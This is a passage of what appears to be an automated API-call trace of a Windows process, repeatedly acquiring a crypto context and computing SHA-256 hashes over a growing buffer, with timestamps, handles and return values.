(HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44d20 [0119.193] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44d20, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44d20, pdwDataLen=0xceadc) returned 1 [0119.193] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.194] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.194] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.194] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.194] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x280, dwFlags=0x0) returned 1 [0119.194] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44cf0 [0119.194] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44cf0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44cf0, pdwDataLen=0xceadc) returned 1 [0119.194] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.194] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.194] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.195] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.195] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0119.195] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.195] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44fc0 [0119.195] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44fc0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44fc0, pdwDataLen=0xceadc) returned 1 [0119.195] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.195] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.195] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.195] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.196] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0119.196] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.196] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44d50 [0119.196] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44d50, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44d50, pdwDataLen=0xceadc) returned 1 [0119.196] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.196] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.196] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.196] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.196] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0119.196] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.196] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45020 [0119.196] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45020, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45020, pdwDataLen=0xceadc) returned 1 [0119.196] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.196] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.196] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.197] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.197] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x300, dwFlags=0x0) returned 1 [0119.197] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.197] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44f00 [0119.197] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44f00, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44f00, pdwDataLen=0xceadc) returned 1 [0119.197] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.197] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.197] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.198] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.198] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x320, dwFlags=0x0) returned 1 [0119.198] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.198] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44d80 [0119.198] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44d80, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44d80, pdwDataLen=0xceadc) returned 1 [0119.198] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.198] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.198] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.198] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.198] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x340, dwFlags=0x0) returned 1 [0119.198] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.198] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44f60 [0119.198] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44f60, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44f60, pdwDataLen=0xceadc) returned 1 [0119.198] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.198] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.199] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.199] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.199] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x360, dwFlags=0x0) returned 1 [0119.199] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.199] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44de0 [0119.199] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44de0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44de0, pdwDataLen=0xceadc) returned 1 [0119.199] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.199] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.199] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.200] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.200] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x380, dwFlags=0x0) returned 1 [0119.200] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.200] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44db0 [0119.200] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44db0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44db0, pdwDataLen=0xceadc) returned 1 [0119.200] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.200] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.200] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.200] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.200] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0119.200] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.201] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44e10 [0119.201] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44e10, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44e10, pdwDataLen=0xceadc) returned 1 [0119.201] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.201] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.201] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.201] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.201] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0119.201] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.201] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44e40 [0119.201] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44e40, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44e40, pdwDataLen=0xceadc) returned 1 [0119.201] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.201] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.201] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.202] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.202] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0119.202] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.202] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44e70 [0119.202] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44e70, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44e70, pdwDataLen=0xceadc) returned 1 [0119.202] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.206] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.206] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.207] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.207] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x400, dwFlags=0x0) returned 1 [0119.207] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44ed0 [0119.207] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44ed0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44ed0, pdwDataLen=0xceadc) returned 1 [0119.207] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.207] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.207] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.207] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.207] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x420, dwFlags=0x0) returned 1 [0119.207] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44f90 [0119.207] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44f90, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44f90, pdwDataLen=0xceadc) returned 1 [0119.208] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.208] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.208] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.208] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.208] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x440, dwFlags=0x0) returned 1 [0119.208] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.208] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45680 [0119.208] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45680, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45680, pdwDataLen=0xceadc) returned 1 [0119.208] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.208] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.208] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.209] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.209] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x460, dwFlags=0x0) returned 1 [0119.209] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45b90 [0119.209] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45b90, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45b90, pdwDataLen=0xceadc) returned 1 [0119.209] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.209] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.209] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.209] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.209] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x480, dwFlags=0x0) returned 1 [0119.210] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.210] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45b30 [0119.210] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45b30, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45b30, pdwDataLen=0xceadc) returned 1 [0119.210] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.210] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.210] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.210] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.210] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0119.210] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.210] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45c50 [0119.210] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45c50, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45c50, pdwDataLen=0xceadc) returned 1 [0119.210] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.210] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.210] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.211] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.211] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0119.211] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.211] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45c20 [0119.211] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45c20, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45c20, pdwDataLen=0xceadc) returned 1 [0119.211] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.211] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.211] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.212] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.212] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0119.212] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.212] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e458f0 [0119.212] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e458f0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e458f0, pdwDataLen=0xceadc) returned 1 [0119.212] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.212] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.212] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.212] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.212] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x500, dwFlags=0x0) returned 1 [0119.212] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.212] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e459e0 [0119.212] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e459e0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e459e0, pdwDataLen=0xceadc) returned 1 [0119.212] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.213] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.213] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.213] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.213] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x520, dwFlags=0x0) returned 1 [0119.213] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e455f0 [0119.213] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e455f0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e455f0, pdwDataLen=0xceadc) returned 1 [0119.213] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.213] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.213] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.214] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.214] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x540, dwFlags=0x0) returned 1 [0119.214] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.214] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e455c0 [0119.214] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e455c0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e455c0, pdwDataLen=0xceadc) returned 1 [0119.214] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.214] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.214] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.215] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.215] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x560, dwFlags=0x0) returned 1 [0119.215] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.215] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45b00 [0119.215] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45b00, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45b00, pdwDataLen=0xceadc) returned 1 [0119.215] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.215] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.215] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.215] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.215] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x580, dwFlags=0x0) returned 1 [0119.215] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.215] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45c80 [0119.215] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45c80, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45c80, pdwDataLen=0xceadc) returned 1 [0119.215] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.215] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.215] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.216] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.216] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x5a0, 